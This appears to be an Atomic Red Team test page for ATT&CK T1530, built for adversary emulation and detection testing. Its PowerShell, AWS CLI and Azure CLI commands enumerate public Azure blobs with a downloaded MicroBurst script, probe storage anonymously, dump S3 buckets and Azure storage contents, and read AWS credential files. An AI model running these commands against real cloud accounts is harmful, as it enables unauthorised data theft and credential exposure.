
T1530 - Data from Cloud Storage Object

Description from ATT&CK

Adversaries may access data from cloud storage.

Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform.

In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) through which to interact with the stored objects: instead, data from these solutions is retrieved directly through the Cloud API. In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., Data from Information Repositories).
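In practice this means an object can be fetched with nothing more than an HTTP request against the provider's storage endpoint. A minimal sketch in PowerShell, assuming a hypothetical storage account "contoso" with a publicly readable container "public-data":

# Minimal sketch: anonymous GET straight against the Blob service endpoint.
# "contoso" and "public-data/report.csv" are hypothetical example names; the
# request carries no credentials and succeeds only if anonymous read is allowed.
Invoke-WebRequest -Uri "https://contoso.blob.core.windows.net/public-data/report.csv" -OutFile "$env:temp\report.csv"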

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured: typically by unintentionally allowing public access to unauthenticated users, granting overly broad access to all users, or even permitting access to anyone outside the control of the Identity and Access Management system without so much as basic user permissions.

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)
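Defenders can look for this class of exposure directly. As a minimal sketch using the Azure CLI (assuming an already-authenticated az login session), the following lists storage accounts that still permit anonymous blob access:

# List storage accounts whose allowBlobPublicAccess property is still enabled;
# the filter is standard JMESPath applied to the az CLI's JSON output.
az storage account list --query "[?allowBlobPublicAccess].{name:name, resourceGroup:resourceGroup}" --output table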

Adversaries may also obtain and then abuse leaked credentials from source repositories, logs, or other means to gain access to cloud storage objects.
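For illustration, one common way such leaks are found is to scan a source tree for strings shaped like AWS access key IDs. A minimal sketch; the repository path is a hypothetical example:

# Flag anything matching the well-known AKIA access-key-ID pattern.
Get-ChildItem -Path "C:\src\repo" -Recurse -File | Select-String -Pattern 'AKIA[0-9A-Z]{16}' | Select-Object Path, LineNumber, Line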

Atomic Tests


Atomic Test #1 - Azure - Enumerate Azure Blobs with MicroBurst

Upon successful execution, this test will use a wordlist to enumerate the public-facing containers and blobs of a specified Azure storage account. See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/.

Supported Platforms: Iaas:azure

auto_generated_guid: 3dab4bcc-667f-4459-aea7-4162dd2d6590

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| base | Azure blob keyword to enumerate (example: storage account name) | string | secure |
| output_file | File to output results to | string | $env:temp\T1530Test1.txt |
| wordlist | File path to keywords for search permutations | string | PathToAtomicsFolder\..\ExternalPayloads\permutations.txt |

Attack Commands: Run with powershell!

import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"
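For context, the core of this enumeration can be approximated in a few lines: append each wordlist entry to the base keyword and check whether the resulting storage account name resolves in DNS, since existing accounts are discoverable before any HTTP request is made. A minimal sketch of that idea (not the MicroBurst implementation itself; values are illustrative):

$base = "secure"
foreach ($word in Get-Content "permutations.txt") {
    # A DNS hit means the storage account exists; its containers can then be
    # probed for public listing with ?restype=container&comp=list requests.
    if (Resolve-DnsName "$base$word.blob.core.windows.net" -ErrorAction SilentlyContinue) {
        Write-Output "Candidate storage account found: $base$word"
    }
}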

Cleanup Commands:

remove-item #{output_file} -erroraction silentlycontinue

Dependencies: Run with powershell!

Description: The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
Check Prereq Commands:
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
Description: The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
Check Prereq Commands:
if (test-path "#{wordlist}"){exit 0} else {exit 1}
Get Prereq Commands:
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}"


Atomic Test #2 - Azure - Scan for Anonymous Access to Azure Storage (Powershell)

Upon successful execution, this test will check for anonymous access to Azure storage containers by invoking a web request and writing the results to a file. The response can then be interpreted to determine whether or not the resource/container exists, as well as other information. See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service

Supported Platforms: Iaas:azure

auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| base_name | Azure storage account name to test | string | T1530Test2 |
| output_file | File to output results to | string | $env:temp\T1530Test2.txt |
| container_name | Container name to search for (optional) | string | |
| blob_name | Blob name to search for (optional) | string | |

Attack Commands: Run with powershell!

# Probe the target URL anonymously; if the GET succeeds, the object is publicly accessible.
try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
# On failure, read the error body returned by the storage service so the result can still be interpreted.
catch [system.net.webexception]
{if($_.Exception.Response -ne $null)
{$Response = $_.Exception.Response.GetResponseStream()
$ReadResponse = New-Object System.IO.StreamReader($Response)
$ReadResponse.BaseStream.Position = 0
$responseBody = $ReadResponse.ReadToEnd()}
else {$responseBody = "The storage account could not be anonymously accessed."}}
# Record the outcome for later review.
"Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append

Cleanup Commands:

remove-item #{output_file} -erroraction silentlycontinue


Atomic Test #3 - AWS - Scan for Anonymous Access to S3

Upon successful execution, this test will check for anonymous access to an AWS S3 bucket and dump all of its files to a local folder.

Supported Platforms: Iaas:aws

auto_generated_guid: 979356b9-b588-4e49-bba4-c35517c484f5

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| s3_bucket_name | Name of the bucket | string | redatomic-test2 |

Attack Commands: Run with sh!

aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name}
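If a full recursive copy is more than needed, a lighter-weight probe is to list the bucket anonymously first; --no-sign-request suppresses credential signing in the same way:

# Anonymous listing: succeeds only if the bucket allows public reads.
aws s3 ls s3://#{s3_bucket_name} --no-sign-request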

Cleanup Commands:

aws s3 rb s3://#{s3_bucket_name} --force 
rm -rf /tmp/#{s3_bucket_name}

Dependencies: Run with sh!

Description: Check if the ~/.aws/credentials file has a default stanza configured
Check Prereq Commands:
cat ~/.aws/credentials | grep "default"
aws s3api create-bucket --bucket #{s3_bucket_name}
aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json
touch /tmp/T1530.txt
aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name}
Get Prereq Commands:
echo Please install the aws-cli and configure your AWS default profile using: aws configure
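The policy.json referenced above (shipped under T1530/src in the Atomic Red Team repository) is what opens the test bucket to anonymous reads; the repository file is authoritative. A bucket policy of roughly this shape, using the default bucket name, would have that effect (illustrative sketch only):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "IllustrativePublicRead",
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": ["arn:aws:s3:::redatomic-test2", "arn:aws:s3:::redatomic-test2/*"]
    }
  ]
}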


Atomic Test #4 - Azure - Dump Azure Storage Account Objects via Azure CLI

This test dumps the content of the storage account objects listed in the file defined in storage_account_objects_csv_file_path. Note that this file is created by the atomic test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". When created manually, it must contain the columns "ResourceGroup", "StorageAccountName", "FileShareName", "ContainerName", "BlobName".
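When building the file by hand, a minimal example would look like this (illustrative resource names; the first data row drives the file share branch of the script, the second the container branch):

"ResourceGroup","StorageAccountName","FileShareName","ContainerName","BlobName"
"rg-demo","stdemoaccount","share1","",""
"rg-demo","stdemoaccount","","container1",""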

Requirements:
- The test is intended to be executed in interactive mode (with the -Interactive parameter) in order to complete the az login command when MFA is required.
- The Entra ID user must have the "Storage Account Contributor" role, or a role with similar permissions.

Supported Platforms: Iaas:azure

auto_generated_guid: 67374845-b4c8-4204-adcc-9b217b65d4f1

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Folder path to output file share content to | path | $env:temp\T1530_storage_account_objects |
| storage_account_objects_csv_file_path | Path to a CSV file that contains all storage account objects. This may be the result from test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". | path | $env:temp\T1619_storage_account_objects.csv |

Attack Commands: Run with powershell!

$storage_account_objects = Import-Csv -Path "#{storage_account_objects_csv_file_path}"
 
# Login to Azure
az login
 
if (-not (Test-Path -Path "#{output_folder}")) {
    New-Item -ItemType Directory -Path "#{output_folder}"
}
 
foreach ($row in $storage_account_objects) {
    
    if ($row.FileShareName -ne ""){
        $allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess"
 
        if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
            Write-Output "Shared key access is disabled for this storage account."
        } else {
            Write-Output "Fetching content from file share: $($row.FileShareName) in storage account $($row.StorageAccountName) ..."
            $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv
            
            # Create folder for storage account objects
            $storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)"
            if (-not (Test-Path -Path $storageAccountOutputPath)) {
                New-Item -ItemType Directory -Path $storageAccountOutputPath
            }
 
            # create folder for file share content
            $fileSharePath = Join-Path -Path $storageAccountOutputPath $row.FileShareName
            if (-not (Test-Path -Path $fileSharePath)) {
                New-Item -ItemType Directory -Path $fileSharePath
            }
            az storage file download-batch --connection-string $connectionString --source $row.FileShareName --destination $fileSharePath
        }
    } elseif ($row.ContainerName -ne "" -and $row.BlobName -eq "") {
        $allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess"
 
        if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
            Write-Output "Shared key access is disabled for this storage account."
        } else {
            Write-Output "Fetching all blobs from container $($row.ContainerName) in storage account $($row.StorageAccountName) ..."
            $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv
            
            # Create folder for storage account objects
            $storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)"
            if (-not (Test-Path -Path $storageAccountOutputPath)) {
                New-Item -ItemType Directory -Path $storageAccountOutputPath
            }
 
            # create folder for blob content
            $containerFolderPath = Join-Path $storageAccountOutputPath $row.ContainerName
            if (-not (Test-Path -Path $containerFolderPath)) {
                New-Item -ItemType Directory -Path $containerFolderPath
            }
            az storage blob download-batch --destination $containerFolderPath --source $row.ContainerName --connection-string $connectionString
        }
    }
}

Cleanup Commands:

Remove-Item -Path "#{output_folder}" -Recurse -Force -erroraction silentlycontinue
Write-Output "Removed #{output_folder}"

Dependencies: Run with powershell!

Description: Azure CLI must be installed
Check Prereq Commands:
try {if (Get-Command az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
Invoke-WebRequest -Uri "https://aka.ms/installazurecliwindows" -OutFile "$env:temp\AzureCLI.msi"; Start-Process msiexec.exe -ArgumentList '/I', "$env:temp\AzureCLI.msi", '/quiet' -Wait